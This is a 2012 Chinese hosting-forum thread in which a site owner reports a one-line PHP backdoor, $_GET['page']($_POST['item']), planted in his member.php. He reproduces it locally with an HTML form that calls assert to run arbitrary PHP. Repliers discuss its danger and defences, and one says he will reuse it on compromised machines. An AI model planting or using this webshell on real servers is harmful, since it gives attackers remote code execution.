全球主机交流论坛

标题: 某人在我一个页面里留下了这个 [打印本页]

作者: miniloop 时间: 2012-2-16 15:13
标题: 某人在我一个页面里留下了这个
本帖最后由 miniloop 于 2012-2-16 17:42 编辑

莫名奇妙就负载奇高，默默地查了一晚上，发现某人在一个php页面里留下了这个

@ $_GET['page']($_POST['item']);

复制代码

这不就是传说中的一句话后门么？

======================================
编辑for更新

黑阔厉害啊，尼玛查半天终于知道他是怎样搞的了。
由于我装系统的时候就禁用了eval，他不可能用，网上查了半天知道了
assert也可以直接执行php代码。
现在在本机模拟了下。

建一个post.html

<form action = "test.php?page=assert" method = "post">
<input type = "text" name = "item" />
<input type = "submit" value = "运行" />
</form>

复制代码

复制代码
再建一个test.php

<?php $_GET['page']($_POST['item']); ?>

复制代码

复制代码
这个post.html在任何电脑上运行都可以，只要action的地址是那个test.php.

在输入框里输入： phpinfo(); 点击运行按钮，
尼玛 phpinfo就直接出来啦，太可怕了，这可以为所欲为了啊

(, 下载次数: 3)
(, 下载次数: 0)

作者: zyzit 时间: 2012-2-16 15:14
本帖最后由 zyzit 于 2012-2-16 15:14 编辑

我不会这个没学过PHP

作者: 勇少 时间: 2012-2-16 15:14
看不懂

作者: light 时间: 2012-2-16 15:14
不懂

作者: whos 时间: 2012-2-16 15:19
牛

作者: miniloop 时间: 2012-2-16 15:25
如果 page = eval 的话，那item就可以是任何php语句了。
但是我已经禁止了eval的啊，他怎么还能执行php呢

作者: geyunbing 时间: 2012-2-16 15:26
提示: 作者被禁止或删除内容自动屏蔽

作者: 用户名 时间: 2012-2-16 15:29
类似

作者: wdlth 时间: 2012-2-16 15:34
是一句话后门

作者: miniloop 时间: 2012-2-16 16:20
本帖最后由 miniloop 于 2012-2-16 16:31 编辑

黑阔厉害啊，尼玛查半天终于知道他是怎样搞的了。
由于我装系统的时候就禁用了eval，他不可能用，网上查了半天知道了
assert也可以直接执行php代码。
现在在本机模拟了下。

建一个post.html

<form action = "test.php?page=assert" method = "post">
<input type = "text" name = "item" />
<input type = "submit" value = "运行" />
</form>

复制代码

再建一个test.php

<?php
$_GET['page']($_POST['item']);
?>

复制代码

这个post.html在任何电脑上运行都可以，只要action的地址是那个test.php.

在输入框里输入： phpinfo();
尼玛 phpinfo就直接出来啦，太可怕了，这可以为所欲为了啊

作者: 金关村村长 时间: 2012-2-16 16:22
很厉害的样子

作者: 副站长 时间: 2012-2-16 16:24
这个得收藏。

作者: mb2004 时间: 2012-2-16 16:31
提示: 作者被禁止或删除内容自动屏蔽

作者: edear 时间: 2012-2-16 16:32
本帖最后由 edear 于 2012-2-16 16:40 编辑

厉害刚测试了下确实如此

作者: 百度 时间: 2012-2-16 16:41
额，php语句不过滤掉？还可以留言出来？
还可以执行？
开玩笑吧。

作者: October十月 时间: 2012-2-16 16:41
都是大黑阔……

作者: skycms 时间: 2012-2-16 16:43
后门你懂的

作者: oldghost 时间: 2012-2-16 16:47
太可怕了

作者: xspoco 时间: 2012-2-16 19:23
牛逼..

作者: hackfengl 时间: 2012-2-16 19:37
一句话。

作者: onlybird 时间: 2012-2-16 19:43
又学到了一招..嘿嘿。果断加到肉鸡里去

作者: ph4ntasy 时间: 2012-2-16 20:00
mark mark

作者: Comcast 时间: 2012-2-16 20:14
学习了

作者: lzd130 时间: 2012-2-16 20:34

作者: 藐视天地 时间: 2012-2-16 20:35
黑阔啊

作者: osiris 时间: 2012-2-16 21:02
标志下

作者: guyusoftware 时间: 2012-2-16 21:13

杯具

作者: 一手好湿 时间: 2012-2-16 23:33
怎么禁用eval？

作者: Captain 时间: 2012-2-17 00:18
mark

作者: hack715 时间: 2012-2-17 00:32
这个黑客有点技术！

作者: Mr.Ra1n 时间: 2012-2-17 02:37
mark

作者: du45273117 时间: 2012-2-17 03:12
本帖最后由 du45273117 于 2012-2-17 03:12 编辑

问下，让他看到phpinfo又怎样

作者: Comcast 时间: 2012-2-17 07:24
本帖最后由 Comcast 于 2012-2-17 07:25 编辑

du45273117 发表于 2012-2-17 03:12 问下，让他看到phpinfo又怎样

假如执行其他代码呢？fopen php大马？

作者: 云生 时间: 2012-2-17 08:04
怎么检测有没有中毒？？

作者: 有个就好 时间: 2012-2-17 10:24
做好权限，都是浮云

作者: cxm 时间: 2012-2-17 10:28
禁用assert()？

作者: du45273117 时间: 2012-2-17 11:40

Comcast 发表于 2012-2-17 07:24
假如执行其他代码呢？fopen php大马？

他是怎么传到你服务器的

作者: newworldtel 时间: 2012-2-17 11:40
小学木毕业.不懂..

作者: du45273117 时间: 2012-2-17 11:43
前提是他要有权限把这2个文件传上去并且有执行权限，我们测试都是自己传上去的，自己想开什么后天就开什么，测试成功不奇怪

作者: miniloop 时间: 2012-2-17 17:40

我擦，这也可以。但你咋往别人服务器上传这.

复制代码

传毛文件！

真实情况是那家伙不知从哪个漏洞进来了并在我的member.php这个文件上加了那一句话，test.php是我为了演示一句话后门而写的！

作者: dianso 时间: 2012-2-17 21:57
哈哈，不是我做的

作者: lvhuan 时间: 2012-2-18 14:04
呵呵

作者: scmlcy 时间: 2012-2-18 14:15
不懂

作者: 母‪鸡 时间: 2012-2-18 14:48
assert用了好多年了。。lz out了

作者: mirshost 时间: 2012-2-18 15:59
膜拜黑客

作者: seevie 时间: 2012-2-18 16:00
强烈围观围观围观。。

作者: HuPo 时间: 2012-2-18 21:34
安全性没做好吧

作者: 半成年 时间: 2012-2-18 22:59
提示: 作者被禁止或删除内容自动屏蔽

作者: wmfy808 时间: 2012-2-18 23:07

miniloop 发表于 2012-2-17 17:40
传毛文件！

真实情况是那家伙不知从哪个漏洞进来了并在我的member.php这个文件上加了那一句话，test.php是 ...

不给member.php修改权限，只给执行权限，他怎么加进去？安全权限要做好，就不怕了

作者: cquyf 时间: 2012-2-18 23:19
不懂啊

作者: 肉鸟 时间: 2012-2-19 03:32
真心看不懂

作者: mslxd 时间: 2012-2-19 17:31
php比较自由，所以比较危险

作者: hising 时间: 2012-2-19 23:37
学习了

作者: x10 时间: 2012-2-20 20:36
这个真危险啊

作者: 小晖 时间: 2012-2-22 06:39
楼主v5, 这样也可以查到。

作者: czc111222 时间: 2012-2-23 00:44

不懂

欢迎光临全球主机交流论坛 (https://lilynana.eu.org/)